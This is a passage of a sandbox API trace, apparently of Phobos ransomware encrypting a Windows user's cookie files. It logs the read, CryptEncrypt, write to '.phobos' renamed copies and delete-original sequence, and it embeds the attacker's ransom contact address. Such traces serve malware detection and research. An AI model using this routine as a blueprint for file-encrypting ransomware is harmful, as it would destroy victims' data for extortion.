HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.118] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.118] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.119] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.119] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.119] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x66, lpOverlapped=0x0) returned 1 [0194.120] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.120] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x70, lpOverlapped=0x0) returned 1 [0194.121] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0194.121] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.121] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80, dwBufLen=0x80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80) returned 1 [0194.121] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.122] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x132, lpOverlapped=0x0) returned 1 [0194.122] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.122] CloseHandle (hObject=0x154) returned 1 [0194.122] CloseHandle (hObject=0x134) returned 1 [0194.122] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt")) returned 1 [0194.123] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.124] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=93) returned 1 [0194.124] CloseHandle (hObject=0x134) returned 1 [0194.125] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt")) returned 0x2020 [0194.125] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.125] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.125] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.126] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.126] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.126] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5d, lpOverlapped=0x0) returned 1 [0194.127] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0194.127] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x60, lpOverlapped=0x0) returned 1 [0194.128] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0194.128] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.128] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.128] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.128] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.128] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.128] CloseHandle (hObject=0x134) returned 1 [0194.128] CloseHandle (hObject=0x154) returned 1 [0194.128] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt")) returned 1 [0194.129] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.130] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=234) returned 1 [0194.130] CloseHandle (hObject=0x154) returned 1 [0194.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt")) returned 0x2020 [0194.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.130] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.130] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.131] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.131] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.131] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xea, lpOverlapped=0x0) returned 1 [0194.132] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0194.132] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0194.133] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0194.136] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.136] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.136] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.136] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.136] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.136] CloseHandle (hObject=0x154) returned 1 [0194.136] CloseHandle (hObject=0x134) returned 1 [0194.136] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt")) returned 1 [0194.137] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.175] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=578) returned 1 [0194.175] CloseHandle (hObject=0x134) returned 1 [0194.175] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt")) returned 0x2020 [0194.175] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.175] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.175] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.176] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.176] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.176] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x242, lpOverlapped=0x0) returned 1 [0194.190] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x250, dwBufLen=0x250 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x250) returned 1 [0194.190] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x250, lpOverlapped=0x0) returned 1 [0194.192] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.192] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.192] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.192] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.192] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.192] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.192] CloseHandle (hObject=0x134) returned 1 [0194.192] CloseHandle (hObject=0x154) returned 1 [0194.192] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt")) returned 1 [0194.193] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.194] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=101) returned 1 [0194.194] CloseHandle (hObject=0x154) returned 1 [0194.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt")) returned 0x2020 [0194.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.194] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.194] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.195] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.195] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.195] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x65, lpOverlapped=0x0) returned 1 [0194.196] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.196] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x70, lpOverlapped=0x0) returned 1 [0194.198] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.198] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.198] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.198] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.200] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: 